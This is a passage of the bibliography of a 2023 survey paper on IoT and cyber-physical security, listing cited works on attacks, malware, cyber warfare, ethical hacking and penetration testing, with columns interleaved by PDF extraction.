[137] Jasone Astorga, Marc Barcelo, Aitor Urbieta, Eduardo Jacob, Revisiting the [168] Pele Li, Mehdi Salour, Xiao Su, A survey of internet worm detection and
feasibility of public key cryptography in light of iiot communications, Sensors 22 containment, IEEE Commun. Surv. Tutor. 10 (1) (2008) 20–35.
(7) (2022) 2561. [169] Feri Sulianta, Comparison of the computer viruses from time to time, 10.37178/
[138] Yaron Sheffer, Ralph Holz, Peter Saint Andre, Summarizing Known Attacks on ca-c. 23.1. 139, CENTRAL ASIA AND THE CAUCASUS 23 (1) (2022) 1386–1391.
Transport Layer Security (Tls) and Datagram Tls (Dtls), Technical report, 2015. [170] Peter Szor, The Art of Computer Virus Research and Defense: ART COMP VIRUS
[139] Dahlia Sam, K. Nithya, S. Deepa Kanmani, Adlin Sheeba, A Shamila Ebenezer, B RES DEFENSE _p1, Pearson Education, 2005.
Uma Maheswari, Jennifer Daffodils Amesh, Survey of Risks and Threats in Online [171] Ken Chiang, Levi Lloyd, A case study of the rustock rootkit and spam bot, HotBots
Learning Applications, Secure Data Management for Online Learning Applications, 7 (2007), 10–10.
2023, p. 2. [172] Zhanjun Zhang, Zhongxiao Man, Yong Li, Improving w ojcik’s eavesdropping
attack on the ping–pong protocol, Phys. Lett. 333 (1–2) (2004) 46–50.

305
J.-P.A. Yaacoub et al. Internet of Things and Cyber-Physical Systems 3 (2023) 280–308

[173] Jr Hubert Rae McLellan, Secure Data Storage with Key Update to Prevent Replay [202] Benoit Dupont, Bots, cops, and corporations: on the limits of enforcement and the
Attacks, US Patent App. 12/015,770, July 23 2009. promise of polycentric regulation as a way to control large-scale cybercrime,
[174] Cheng-I Lai, Alberto Abad, Korin Richmond, Junichi Yamagishi, Najim Dehak, Crime Law Soc. Change 67 (1) (2017) 97–116.
Simon King, Attentive filtering networks for audio replay attack detection, in: [203] Abedelaziz Mohaisen, Alrawi Omar, Unveiling zeus: automated classification of
ICASSP 2019-2019 IEEE International Conference on Acoustics, Speech and Signal malware samples, in: Proceedings of the 22nd International Conference on World
Processing (ICASSP), IEEE, 2019, pp. 6316–6320. Wide Web, ACM, 2013, pp. 829–832.
[175] Meng Liu, Longbiao Wang, Jianwu Dang, Seiichi Nakagawa, Haotian Guan, [204] James P. Farwell, Rafal Rohozinski, Stuxnet and the future of cyber war, Survival
Xiangang Li, Replay attack detection using magnitude and phase information with 53 (1) (2011) 23–40.
attention-based adaptive filters, in: ICASSP 2019-2019 IEEE International [205] Boldizsar Bencsath, Pek Gabor, Levente Buttyan, Mark Felegyhazi, The cousins of
Conference on Acoustics, Speech and Signal Processing (ICASSP), IEEE, 2019, stuxnet: Duqu, flame, and gauss, Future Internet 4 (4) (2012) 971–1003.
pp. 6201–6205. [206] A. Coskun Samli, Laurence Jacobs, Counteracting global industrial espionage: a
[176] Callegati Franco, Cerroni Walter, Marco Ramilli, Man-in-the-middle attack to the damage control strategy, Bus. Soc. Rev. 108 (1) (2003) 95–113.
https protocol, IEEE Secur. Priv. 7 (1) (2009) 78–81. [207] Ronald J Deibert, Rafal Rohozinski, A. Manchanda, Nart Villeneuve,
[177] Bhupendra Singh Thakur, Sapna Chaudhary, Content sniffing attack detection in G.M.F. Walton, Tracking Ghostnet: Investigating a Cyber Espionage Network,
client and server side: a survey, Int. J. Adv. Comput. Res. 3 (2) (2013) 7. 2009.
[178] Matt Weir, Sudhir Aggarwal, Breno De Medeiros, Bill Glodek, Password cracking [208] Dmitri Alperovitch, et al., Revealed: Operation Shady RAT, ume 3, McAfee, 2011.
using probabilistic context-free grammars, in: 2009 30th IEEE Symposium on [209] Deana Shick, OMeara Kyle, Unique Approach to Threat Analysis Mapping: A
Security and Privacy, IEEE, 2009, pp. 391–405. Malware Centric Methodology for Better Understanding the Adversary Landscape,
[179] Jim Owens, Jeanna Matthews, A study of passwords and methods used in brute- CARNEGIE-MELLON UNIV PITTSBURGH PA PITTSBURGH United States, 2016.
force ssh attacks, in: USENIX Workshop on Large-Scale Exploits and Emergent Technical report.
Threats, LEET), 2008. [210] Michael L. Gross, Daphna Canetti, Dana R. Vashdi, The psychological effects of
[180] Arvind Narayanan, Vitaly Shmatikov, Fast dictionary attacks on passwords using cyber terrorism, Bull. At. Sci. 72 (5) (2016) 284–291.
time-space tradeoff, in: Proceedings of the 12th ACM Conference on Computer and [211] Mitko Bogdanoski, Drage Petreski, Cyber terrorism–global security threat,
Communications Security, ACM, 2005, pp. 364–372. Contemp. Macedonian Defense-Int. Sci. Defense, Secur. Peace J. 13 (24) (2013)
[181] Hüseyin Demirci, Ali Aydın Selçuk, A meet-in-the-middle attack on 8-round aes, 59–73.
in: International Workshop on Fast Software Encryption, Springer, 2008, [212] Marwan Albahar, Cyber attacks and terrorism: a twenty-first century conundrum,
pp. 116–126. Sci. Eng. Ethics 25 (4) (2019) 993–1006.
[182] Patrick Gage Kelley, Saranga Komanduri, Michelle L. Mazurek, Richard Shay, [213] Jonalan Brickey, Defining cyberterrorism: capturing a broad range of activities in
Timothy Vidas, Lujo Bauer, Nicolas Christin, Lorrie Faith Cranor, Julio Lopez, cyberspace, Combat. Terror. Centre at West Point 5 (8) (2012).
Guess again (and again and again): measuring password strength by simulating [214] Catherine Lotrionte, State sovereignty and self-defense in cyberspace: a normative
password-cracking algorithms, in: 2012 IEEE Symposium on Security and Privacy, framework for balancing legal rights, Emory Int’l L. Rev. 26 (2012) 825.
IEEE, 2012, pp. 523–537. [215] Gregory L. Keeney, Detlof Von Winterfeldt, Identifying and structuring the
[183] Panagiotis Papantonakis, Dionisios Pnevmatikatos, Ioannis Papaefstathiou, objectives of terrorists, Risk Anal.: Int. J. 30 (12) (2010) 1803–1816.
Charalampos Manifavas, Fast, fpga-based rainbow table creation for attacking [216] Mica Endsley, William M. Jones, Situation Awareness Information Dominance &
encrypted mobile communications, in: 2013 23rd International Conference on Information Warfare, LOGICON TECHNICAL SERVICES INC DAYTON OH, 1997.
Field Programmable Logic and Applications, IEEE, 2013, pp. 1–6. Technical report.
[184] Mihir Bellare, Tadayoshi Kohno, Hash function balance and its impact on birthday [217] John Arquilla, Rebuttal cyberwar is already upon us, Foreign Pol. 192 (2012) 84.
attacks, in: International Conference on the Theory and Applications of [218] Jennifer J. Li, Lindsay Daugherty, Training Cyber Warriors: what Can Be Learned
Cryptographic Techniques, Springer, 2004, pp. 401–418. from Defense Language Training? Technical Report, RAND NATIONAL DEFENSE
[185] Sachin Kadloor, Xun Gong, Negar Kiyavash, Tolga Tezcan, Nikita Borisov, Low- RESEARCH INST SANTA MONICA CA, 2015.
cost side channel remote traffic analysis attack in packet networks, in: 2010 IEEE [219] Tom Gjelten, First strike: us cyber warriors seize the offensive, World Aff. 175
International Conference on Communications, IEEE, 2010, pp. 1–5. (2012) 33.
[186] S Praveen Kumar, S. Swapna, Jamming attacks in wireless networks, Int. J. [220] Christina Schori Liang, Cyber jihad: understanding and countering islamic state
Comput. Sci. Netw. Secur. 13 (10) (2013) 110–113. propaganda, GSCP Policy Paper (2) (2015) 4.
[187] Latha Tamilselvan, V. Sankaranarayanan, Prevention of blackhole attack in manet, [221] Andrew James, Kenneth Geers, et al., ‘compelling opponents to our will’: the role
in: The 2nd International Conference on Wireless Broadband and Ultra Wideband of cyber warfare in Ukraine, in: Cyber War in Perspective: Russian Aggression
Communications (AusWireless 2007), IEEE, 2007, 21–21. against Ukraine, NATO CCDCOE, 2015, pp. 39–48.
[188] Adwan Yasin, Mahmoud Abu Zant, Detecting and isolating black-hole attacks in [222] Rain Ottis, Analysis of the 2007 cyber attacks against Estonia from the information
manet using timer based baited technique, Wireless Commun. Mobile Comput. warfare perspective, in: Proceedings of the 7th European Conference on
2018 (2018). Information Warfare, 2008, p. 163.
[189] A. Geetha, N. Sreenath, Byzantine attacks and its security measures in mobile [223] Ian Traynor, Russia accused of unleashing cyberwar to disable Estonia, Guardian
adhoc networks, IJCCIE 2016 (2016). 17 (5) (2007).
[190] Anderson Bergamini de Neira, Burak Kantarci, Michele Nogueira, Distributed [224] Nurgul Yasar, Fatih Mustafa Yasar, Yucel Topcu, Operational advantages of using
Denial of Service Attack Prediction: Challenges, Open Issues and Opportunities, cyber electronic warfare (cew) in the battlefield, in: Cyber Sensing 2012, vol.
Computer Networks, 2023, 109553. 8408, International Society for Optics and Photonics, 2012, 84080G.
[191] Ivan Ristic, Bulletproof SSL and TLS: Understanding and Deploying SSL/TLS and [225] Askin Osman, Riza Irmak, Mustafa Avsever, Cyber warfare and electronic warfare
PKI to Secure Servers and Web Applications, Feisty Duck, 2013. integration in the operational environment of the future: cyber electronic warfare,
[192] Jani Hautakorpi, Gonzalo Camarillo, R. Penfield, Alan Hawrylyshen, in: Cyber Sensing 2015, vol. 9458, International Society for Optics and Photonics,
Medhavi Bhatia, Requirements from Session Initiation Protocol (Sip) Session 2015, 94580H.
Border Control (Sbc) Deployments. RFC5853, IETF, 2010. [226] Elizabeth Van Wie Davis, Shadow Warfare: Cyberwar Policy in the United States,
[193] M. Hasan, Jag Mohan Thakur, Prajoy Podder, Design and implementation of fhss Russia and China, Rowman & Littlefield Publishers, 2021.
and dsss for secure data transmission, Int. j. signal proc. syst. 4 (2) (2016) [227] Keir Giles, The Next Phase of Russian Information Warfare, vol. 20, NATO
144–149. Strategic Communications Centre of Excellence Riga, 2016.
[194] Fahmina Taranum, Ayesha Sarvat, Nooria Ali, Shamekh Siddiqui, Detection and [228] Even Mediu, Nato and Russia in the Balkans, Power Struggle for Influence between
prevention of blackhole node, in: 2020 4th International Conference on Two Security Zones. Case Studies of Albania, Montenegro, and Croatia, PhD thesis,
Electronics, Materials Engineering & Nano-Technology (IEMENTech), IEEE, 2020, Webster University, 2021.
pp. 1–7. [229] Wrightson Tyler, Advanced Persistent Threat Hacking: the Art and Science of
[195] Hanane Kalkha, Satori Hassan, Khalid Satori, Preventing black hole attack in Hacking Any Organization, McGraw-Hill Education Group, 2014.
wireless sensor network using hmm, Proc. Comput. Sci. 148 (2019) 552–561. [230] Jibran Saleem, Bamidele Adebisi, Ande Ruth, Mohammad Hammoudeh, A state of
[196] M.M. Mogunova, Criminal Law Analysis of Cyber Threats in the Business the art survey-impact of cyber attacks on sme's, in: Proceedings of the
Environment, OF OMSK UNIVERSITY, 2021. International Conference on Future Networks and Distributed Systems, 2017.
[197] Shaheen Shariff, Confronting Cyber-Bullying: what Schools Need to Know to [231] Deanna D. Caputo, Shari Lawrence Pfleeger, Jesse D. Freeman, M Eric Johnson,
Control Misconduct and Avoid Legal Consequences, ERIC, 2009. Going spear phishing: exploring embedded training and awareness, IEEE Secur.
[198] Shivender Singh, Anil K. Sarje, Manoj Misra, Client-side counter phishing Priv. 12 (1) (2014) 28–38.
application using adaptive neuro-fuzzy inference system, in: Computational [232] Jason Hong, The state of phishing attacks, Commun. ACM 55 (1) (2012) 74–81.
Intelligence and Communication Networks (CICN), 2012 Fourth International [233] M.T. Chadwick, J.G. Soussan, T.C. Martin, D. Mallick, S.S. Alam, Bank robbery: the
Conference on, IEEE, 2012, pp. 788–792. real losers in the 1998 Bangladesh flood, Land Degrad. Dev. 12 (3) (2001)
[199] Yanping Zhang, Yang Xiao, Kaveh Ghaboosi, Jingyuan Zhang, Hongmei Deng, 251–260.
A survey of cyber crimes, Secur. Commun. Network. 5 (4) (2012) 422–437. [234] Mike Lennon, Hackers Hit 100 Banks in Unprecedented $1 Billion Cyber Heist:
[200] Vadim Kotov, Fabio Massacci, Anatomy of exploit kits, in: International Kaspersky Lab, Security Week, 2015.
Symposium on Engineering Secure Software and Systems, Springer, 2013, [235] Ashish Garg, Jeffrey Curtis, Hilary Halper, Quantifying the financial impact of it
pp. 181–196. security breaches, Inf. Manag. Comput. Secur. 11 (2) (2003) 74–83.
[201] Aditya K. Sood, Richard J. Enbody, Rohit Bansal, Dissecting spyeye–understanding [236] J. Bergal, Hacktivists Launch More Cyberattacks against Local, State Governments,
the design of third generation botnets, Comput. Network. 57 (2) (2013) 436–450. 2017.
[237] Stephen Herzog, Revisiting the Estonian Cyber Attacks: Digital Threats and
Multinational Responses, 2011.

306
J.-P.A. Yaacoub et al. Internet of Things and Cyber-Physical Systems 3 (2023) 280–308

[238] Ellen Nakashima, Russian Government Hackers Penetrated Dnc, Stole Opposition [272] S.G. Rameshkumar, G. Mohan, Counter and timer based baited method for
Research on Trump, 2016. Washington Post online. separating blackhole attacks in manet, Ann. Roman. Soc. Cell Biol. 25 (6) (2021)
[239] D. Maron, Us hospitals not immune to crippling cyber-attacks: outdated systems 897–904.
and earlier breaches underscore America's healthcare data security risks, Sci. Am. [273] Samuel Adu-Gyimah, George Asante, and Oliver Kufuor Boansi. Social engineering
15 (2017). Last modified May. attacks: a clearer perspective. Int. J. Comput. Appl.s, 975:8887.
[240] Lynne Coventry, Dawn Branley, Cybersecurity in healthcare: a narrative review of [274] Kristan Stoddart, Gaining access: attack and defense methods and legacy systems,
trends, threats and ways forward, Maturitas 113 (2018) 48–52. in: Cyberwarfare, Springer, 2022, pp. 227–280.
[241] Jason Andress, Steve Winterfeld, Cyber Warfare: Techniques, Tactics and Tools for [275] Jielin Dong, Network Dictionary, Javvin Technologies Inc., 2007.
Security Practitioners, Elsevier, 2013. [276] E Pike Ronald, The “ethics” of teaching ethical hacking, J. Int. Technol. Inf.
[242] Michael Robinson, Kevin Jones, Helge Janicke, Cyber warfare: issues and Manag. 22 (4) (2013) 4.
challenges, Comput. Secur. 49 (2015) 70–94. [277] Syed A. Saleem, Ethical hacking as a risk management technique, in: Proceedings
[243] Stinissen Jan, Kenneth Geers, A legal framework for cyber operations in Ukraine, of the 3rd Annual Conference on Information Security Curriculum Development,
in: Cyber War in Perspective: Russian Aggression against Ukraine, NATO CCDCOE ACM, 2006, pp. 201–203.
Publications, Tallinn, 2015, pp. 123–134. [278] Bushra Siddiqua Oosman, Ravishankar Dudhe, Review on the ethical and legal
[244] Filiz Katman, The Islamic Republic of Iran's cyber security strategy: challenges in challenges with iot, in: 2021 International Conference on Computational
an era of cyber uncertainty, in: Routledge Companion to Global Cyber-Security Intelligence and Knowledge Economy (ICCIKE), IEEE, 2021, pp. 529–534.
Strategy, Routledge, 2021, pp. 435–447. [279] Leyla Bilge, Tudor Dumitras, Before we knew it: an empirical study of zero-day
[245] Ahmed K. Al-Rawi, Cyber warriors in the middle east: the case of the syrian attacks in the real world, in: Proceedings of the 2012 ACM Conference on
electronic army, Publ. Relat. Rev. 40 (3) (2014) 420–428. Computer and Communications Security, ACM, 2012, pp. 833–844.
[246] Dina Matar, The syrian regime's strategic political communication: practices and [280] Don Coppersmith, Another birthday attack, in: Conference on the Theory and
ideology, Int. J. Commun. 13 (19) (2019). Application of Cryptographic Techniques, Springer, 1985, pp. 14–17.
[247] Kenneth Geers, Darien Kindlund, Ned Moran, Rob Rachwald, World war c: [281] Marc Girault, Robert Cohen, Mireille Campana, A generalized birthday attack, in:
understanding nation-state motives behind today's advanced cyber attacks, Workshop on the Theory and Application of of Cryptographic Techniques,
FireEye, Milpitas, CA, USA, Tech. Rep. Sep (2014). Springer, 1988, pp. 129–156.
[248] Long Cheng, Fang Liu, Danfeng Yao, Enterprise data breach: causes, challenges, [282] Ilsun You, Kangbin Yim, Malware obfuscation techniques: a brief survey, in:
prevention, and future directions, Wiley Interdisciplinary Reviews: Data Min. Broadband, Wireless Computing, Communication and Applications (BWCCA),
Knowl. Discov. 7 (5) (2017), e1211. 2010 International Conference on, IEEE, 2010, pp. 297–300.
[249] Ping Wang, Christopher Johnson, Cybersecurity incident handling: a case study of [283] Alana Maurushat, Ethical Hacking, University of Ottawa Press, 2019.
the equifax data breach, Issues in Information Systems 19 (3) (2018). [284] G.S. Sriram, Security challenges of big data computing, Int. Res. J. Modern. Eng.
[250] Gerhard Eschelbeck, The laws of vulnerabilities, Black Hat Briefings 2606 (2004). Technol. Sci. 4 (1) (2022) 1164–1171.
[251] Zuzana Hromcov a and Anton Cherepanov. Anatomy of Native Iis Malware. [285] Jean-Paul A. Yaacoub,and Hassan N. Noura, Ola Salman, Ola and Ali Chehab,
[252] Rui Li, Wenrui Diao, Li Zhou, Shishuai Yang, Shuang Li, Shanqing Guo, Android Advanced digital forensics and anti-digital forensics for iot systems: techniques,
Custom Permissions Demystified: A Comprehensive Security Evaluation, IEEE limitations and recommendations, Int. Things 19 (2022), 100544.
Transactions on Software Engineering, 2021. [286] Mark Crosbie, Hack the cloud: ethical hacking and cloud forensics, in: Cloud
[253] S.V. Bezzateev, S.G. Fomicheva, G.A. Zhemelev, Agent-based zerologon Technology: Concepts, Methodologies, Tools, and Applications, IGI Global, 2015,
vulnerability detection, in: 2021 Wave Electronics and its Application in pp. 1510–1526.
Information and Telecommunication Systems (WECONF), IEEE, 2021, pp. 1–5. [287] A Alfred Raja Melvin, G.Jaspher W. Kathrine, S Sudhakar Ilango, S. Vimal,
[254] Shaen Corbet, John W. Goodell, The reputational contagion effects of ransomware Seungmin Rho, Neal N. Xiong, Yunyoung Nam, Dynamic malware attack dataset
attacks, Finance Res. Lett. 47 (2022), 102715. leveraging virtual machine monitor audit data for the detection of intrusions in
[255] Hannah T. Neprash, Claire C. McGlave, Dori A. Cross, Beth A. Virnig, Michael cloud, Trans. Emerg. Telecommun. Technol. 33 (4) (2022) e4287.
A. Puskarich, D Huling Jared, Alan Z. Rozenshtein, Sayeh S. Nikpay, Trends in [288] Ben Rafferty, Dangerous skills gap leaves organisations vulnerable, Netw. Secur.
ransomware attacks on us hospitals, clinics, and other health care delivery 2016 (8) (2016) 11–13.
organizations, 2016-2021, in: JAMA Health Forum, vol. 3, American Medical [289] Jamil Danish, Muhammad Numan Ali Khan, Is ethical hacking ethical, Int. J. Eng.
Association, 2022, e224873 e224873. Sci. Technol. 3 (5) (2011) 3758–3763.
[256] Daniel Votipka, Rock Stevens, Elissa Redmiles, Jeremy Hu, Michelle Mazurek, [290] Philip Brey, Ethical aspects of information security and privacy, in: Security,
Hackers vs. testers: a comparison of software vulnerability discovery processes, in: Privacy, and Trust in Modern Data Management, Springer, 2007, pp. 21–36.
2018 IEEE Symposium on Security and Privacy (SP), IEEE, 2018, pp. 374–391. [291] Georg Thomas, Burmeister Ok, Gregory Low, Issues of implied trust in ethical
[257] Jai Narayan Goel, B.M. Mehtre, Vulnerability assessment & penetration testing as hacking, in: Proceedings of the 28th Australasian Conference on Information
a cyber defence technology, Proc. Comput. Sci. 57 (2015) 710–715. Systems, December, 2017, pp. 4–6.
[258] Rina Elizabeth Lopez De Jimenez, Pentesting on web applications using ethical- [292] Bhawana Sahare, Ankit Naik, Shashikala Khandey, Study of ethical hacking, Int. J.
hacking, in: Central American and Panama Convention (CONCAPAN XXXVI), Comput. Sci. Trends Technol 2 (4) (2014) 6–10.
2016 IEEE 36th, IEEE, 2016, pp. 1–6. [293] Harper Allen, Shon Harris, Jonathan Ness, Chris Eagle, Gideon Lenkey,
[259] Muzhir Shaban Al-Ani, Maha Abd Rajab, Biometrics hand geometry using discrete Terron Williams, Gray Hat Hacking the Ethical Hackers Handbook, McGraw-Hill
cosine transform (dct), Sci. Technol. 3 (4) (2013) 112–117. Osborne Media, 2011.
[260] Anil K. Jain, Ajay Kumar, Biometric recognition: an overview, in: Second [294] Jean-Paul A. Yaacoub, Hassan N. Noura, Ola Salman, Chehab Ali, A Survey on
Generation Biometrics: the Ethical, Legal and Social Context, Springer, 2012, Ethical Hacking: Issues and Challenges, 2021 arXiv preprint arXiv:2103.15072.
pp. 49–79. [295] Keyun Ruan, Cybercrime and Cloud Forensics: Applications for Investigation
[261] Mandy Douglas, Karen Bailey, Mark Leeney, Kevin Curran, An overview of Processes: Applications for Investigation Processes, IGI Global, 2012.
steganography techniques applied to the protection of biometric data, Multimed. [296] Ajinkya A. Farsole, Amurta G. Kashikar, Apurva Zunzunwala, Ethical hacking, Int.
Tool. Appl. 77 (13) (2018) 17333–17373. J. Comput. Appl. 1 (10) (2010) 14–20.
[262] Raphael Hiesgen, Marcin Nawrocki, Thomas C. Schmidt, Matthias W€ahlisch, The [297] Lunne Tom, John JM. Powell, Peter K. Robertson, et al., Cone Penetration Testing
Race to the Vulnerable: Measuring the Log4j Shell Incident, 2022, arXiv preprint arXiv:2205.02544.
[263] Hritik Gupta, Alka Chaudhary, Anil Kumar, Identification and analysis of log4j vulnerability, in: 2022 11th International Conference on System Modeling & Advancement in Research Trends (SMART), IEEE, 2022, pp. 1580–1583.
[264] Critical vulnerability in Apache log4j library, https://www.riello-ups.com/news/14255-critical-vulnerability-in-apache-log4j-library, December 2021.
[265] Kevin J. Houle, Trends in Denial of Service Attack Technology, 2001, archive/pdf/DoS_trends.pdf.
[266] Yien Wang, Jianhua Yang, Ethical hacking and network defense: choose your best network vulnerability scanning tool, in: Advanced Information Networking and Applications Workshops (WAINA), 2017 31st International Conference on, IEEE, 2017, pp. 110–113.
[267] Colin Tankard, Advanced persistent threats and how to monitor and deter them, Netw. Secur. 2011 (8) (2011) 16–19.
[268] Sa'ed Abed, Reem Jaffal, Bassam Jamil Mohd, A review on blockchain and IoT integration from energy, security and hardware perspectives, Wireless Pers. Commun. (2023) 1–44.
[269] Jeffrey R. Jones, Estimating software vulnerabilities, IEEE Secur. Priv. 5 (4) (2007) 28–32.
[270] Amas Phillips, Carsten Maple, Florian Lukavsky, Ian Pearson, Michael Richardson, Nigel Hanson, Paul Kearney, Robert Dobson, Software Bills of Materials for IoT and OT Devices, IoT Security Foundation, 2023.
[271] Chris Greamo, Anup Ghosh, Sandboxing and virtualization: modern tools for combating malware, IEEE Secur. Priv. 9 (2) (2011) 79–82.
in Geotechnical Practice, CRC Press, 2014.
[298] James P. McDermott, Attack net penetration testing, in: Proceedings of the 2000 Workshop on New Security Paradigms, ACM, 2001, pp. 15–21.
[299] Thomas M. Chen, Guarding against network intrusions, in: Computer and Information Security Handbook, third ed., Elsevier, 2017, pp. 149–163.
[300] Lee Allen, Advanced Penetration Testing for Highly-Secured Environments: The Ultimate Security Guide, Packt Publishing Ltd, 2012.
[301] Thomas J. Mowbray, Cybersecurity: Managing Systems, Conducting Testing, and Investigating Intrusions, John Wiley & Sons, 2013.
[302] Andrew Tang, A guide to penetration testing, Netw. Secur. 2014 (8) (2014) 8–11.
[303] Sven Türpe, Jörn Eichler, Testing production systems safely: common precautions in penetration testing, in: 2009 Testing: Academic and Industrial Conference - Practice and Research Techniques, IEEE, 2009, pp. 205–209.
[304] Tracey Caldwell, Ethical hackers: putting on the white hat, Netw. Secur. 2011 (7) (2011) 10–13.
[305] Hessa Mohammed Zaher Al Shebli, Babak D. Beheshti, A study on penetration testing process and tools, in: Systems, Applications and Technology Conference (LISAT), 2018 IEEE Long Island, IEEE, 2018, pp. 1–7.
[306] Srinivas Nidhra, Jagruthi Dondeti, Black box and white box testing techniques: a literature review, Int. J. Embed. Syst. Appl. (IJESA) 2 (2) (2012) 29–50.
[307] Mohd Ehmer Khan, Farmeena Khan, et al., A comparative study of white box, black box and grey box testing techniques, Int. J. Adv. Comput. Sci. Appl. 3 (6) (2012).

[308] Jason Bau, Elie Bursztein, Divij Gupta, John Mitchell, State of the art: automated black-box web application vulnerability testing, in: 2010 IEEE Symposium on Security and Privacy, IEEE, 2010, pp. 332–345.
[309] Yury Zhauniarovich, Anton Philippov, Olga Gadyatskaya, Bruno Crispo, Fabio Massacci, Towards black box testing of Android apps, in: Availability, Reliability and Security (ARES), 2015 10th International Conference on, IEEE, 2015, pp. 501–510.
[310] Henry Raúl González Brito, Raydel Montesino Perurena, Riesgos de seguridad en las pruebas de penetración de aplicaciones web: security risks in web application penetration testing, Revista Cubana de Transf. Digit. 2 (2) (2021) 98–117.
[311] G. Jayasuryapal, P. Meher Pranay, Harpreet Kaur, et al., A survey on network penetration testing, in: 2021 2nd International Conference on Intelligent Engineering and Management (ICIEM), IEEE, 2021, pp. 373–378.
[312] Renas R. Asaad, Penetration testing: wireless network attacks method on Kali Linux OS, Acad. J. Nawroz Univ. 10 (1) (2021) 7–12.
[313] Ronald L. Krutz, Russell Dean Vines, Cloud Security: A Comprehensive Guide to Secure Cloud Computing, Wiley Publishing, 2010.
[314] Subashini Subashini, Veeraruna Kavitha, A survey on security issues in service delivery models of cloud computing, J. Netw. Comput. Appl. 34 (1) (2011) 1–11.
[315] Harshdeep Singh, Jaswinder Singh, Penetration testing in wireless networks, Int. J. Adv. Res. Comput. Sci. 8 (5) (2017).
[316] Kemal Hajdarevic, Adna Kozic, Indira Avdagic, Zerina Masetic, Nejdet Dogru, Training network managers in ethical hacking techniques to manage resource starvation attacks using GNS3 simulator, in: 2017 XXVI International Conference on Information, Communication and Automation Technologies (ICAT), IEEE, 2017, pp. 1–6.
[317] Lloyd Greenwald, Robert Shanley, Automated planning for remote penetration testing, in: MILCOM 2009 - 2009 IEEE Military Communications Conference, IEEE, 2009, pp. 1–7.
[318] Aakash Trivedi, A comprehensive online tool [wr-3] that detects security flaws in networks, in: Computer Science and Information Technology (ICCSIT), 2010 3rd IEEE International Conference on, vol. 2, IEEE, 2010, pp. 316–320.
[319] Yong Lu, Xin Luo, Michael Polgar, Yuanyuan Cao, Social network analysis of a criminal hacker community, J. Comput. Inf. Syst. 51 (2) (2010) 31–41.
[320] Yangbin Zhou, Keyu Jiang, An analysis system for computer forensic education, training, and awareness, in: Computing, Measurement, Control and Sensor Network (CMCSN), 2012 International Conference on, IEEE, 2012, pp. 48–51.
[321] Ammar Alazab, Jemal Abawajy, Michael Hobbs, Robert Layton, Ansam Khraisat, Crime toolkits: the productisation of cybercrime, in: 2013 12th IEEE International Conference on Trust, Security and Privacy in Computing and Communications, IEEE, 2013, pp. 1626–1632.
[322] Ahmed Abbasi, Weifeng Li, Victor Benjamin, Shiyu Hu, Hsinchun Chen, Descriptive analytics: examining expert hackers in web forums, in: Intelligence and Security Informatics Conference (JISIC), 2014 IEEE Joint, IEEE, 2014, pp. 56–63.
[323] Rigzin Angmo, Monika Sharma, Performance evaluation of web based automation testing tools, in: Confluence the Next Generation Information Technology Summit (Confluence), 2014 5th International Conference, IEEE, 2014, pp. 731–735.
[324] S. Sandhya, Sohini Purkayastha, Emil Joshua, Akash Deep, Assessment of website security by penetration testing using Wireshark, in: Advanced Computing and Communication Systems (ICACCS), 2017 4th International Conference on, IEEE, 2017, pp. 1–4.
[325] Artem Tetskyi, Vyacheslav Kharchenko, Dmytro Uzun, Neural networks based choice of tools for penetration testing of web applications, in: 2018 IEEE 9th International Conference on Dependable Systems, Services and Technologies (DESSERT), IEEE, 2018.
[326] Christopher Bailey, Rogério de Lemos, Evaluating self-adaptive authorisation infrastructures through gamification, in: 2018 48th Annual IEEE/IFIP International Conference on Dependable Systems and Networks (DSN), IEEE, 2018.
[327] Darrien Rushing, Jason Guidry, Ihssan Alkadi, Collaborative penetration-testing and analysis toolkit (CPAT), in: Aerospace Conference, 2015 IEEE, IEEE, 2015, pp. 1–9.
[328] Vasaka Visoottiviseth, Phuripat Akarasiriwong, Siravitch Chaiyasart, Siravit Chotivatunyu, PENTOS: penetration testing tool for Internet of Thing devices, in: Region 10 Conference, TENCON 2017 - 2017 IEEE, IEEE, 2017, pp. 2279–2284.
[329] Ning Zhu, Chen Xin-yuan, Yong-fu Zhang, Xin Si-yuan, Design and application of penetration attack tree model oriented to attack resistance test, in: Computer Science and Software Engineering, 2008 International Conference on, vol. 3, IEEE, 2008, pp. 622–626.
[330] Norah Ahmed Almubairik, Gary Wills, Automated penetration testing based on a threat model, in: Internet Technology and Secured Transactions (ICITST), 2016 11th International Conference for, IEEE, 2016, pp. 413–414.
[331] Anestis Bechtsoudis, Nicolas Sklavos, Aiming at higher network security through extensive penetration tests, IEEE Latin Am. Trans. 10 (3) (2012) 1752–1756.
[332] Jiajia Wang, Research of penetration test based on mobile internet, in: Computer and Communications (ICCC), 2016 2nd IEEE International Conference on, IEEE, 2016, pp. 2542–2545.
[333] Aaron Guzman, Aditya Gupta, IoT Penetration Testing Cookbook: Identify Vulnerabilities and Secure Your Smart Devices, Packt Publishing Ltd, 2017.
[334] Zhenguo Hu, Razvan Beuran, Yasuo Tan, Automated penetration testing using deep reinforcement learning, in: 2020 IEEE European Symposium on Security and Privacy Workshops (EuroS&PW), IEEE, 2020, pp. 2–10.
[335] Sugandh Shah, B.M. Mehtre, An automated approach to vulnerability assessment and penetration testing using Net-Nirikshak 1.0, in: Advanced Communication Control and Computing Technologies (ICACCCT), 2014 International Conference on, IEEE, 2014, pp. 707–712.
[336] Jai Narayan Goel, Mohsen Hallaj Asghar, Vivek Kumar, Sudhir Kumar Pandey, Ensemble based approach to increase vulnerability assessment and penetration testing accuracy, in: Innovation and Challenges in Cyber Security (ICICCS-INBUSH), 2016 International Conference on, IEEE, 2016, pp. 330–335.
[337] Marc Langheinrich, The internet of thugs?, IEEE Pervasive Comput. 20 (3) (2021) 4–6.
[338] Bohdana Sereda, Jason Jaskolka, An evaluation of IoT security guidance documents: a shared responsibility perspective, Proc. Comput. Sci. 201 (2022) 281–288.
[339] Barakat Raman, Faruk Catal, Sascha Hackel, Axel Rennoch, Martin A. Schneider, Towards a certification scheme for IoT security evaluation, Informatik 2021 (2021).
[340] Michael Fagan, Katerina Megas, Karen Scarfone, Matthew Smith, Core Cybersecurity Feature Baseline for Securable IoT Devices: A Starting Point for IoT Device Manufacturers, Technical report, National Institute of Standards and Technology, 2019.
[341] Michael Fagan, Katerina N. Megas, Karen Scarfone, Matthew Smith, IoT Device Cybersecurity Capability Core Baseline, US Department of Commerce, National Institute of Standards and Technology, 2020.
[342] Michael Fagan, Katerina N. Megas, Karen Scarfone, Matthew Smith, Foundational Cybersecurity Activities for IoT Device Manufacturers, US Department of Commerce, National Institute of Standards and Technology, 2020.
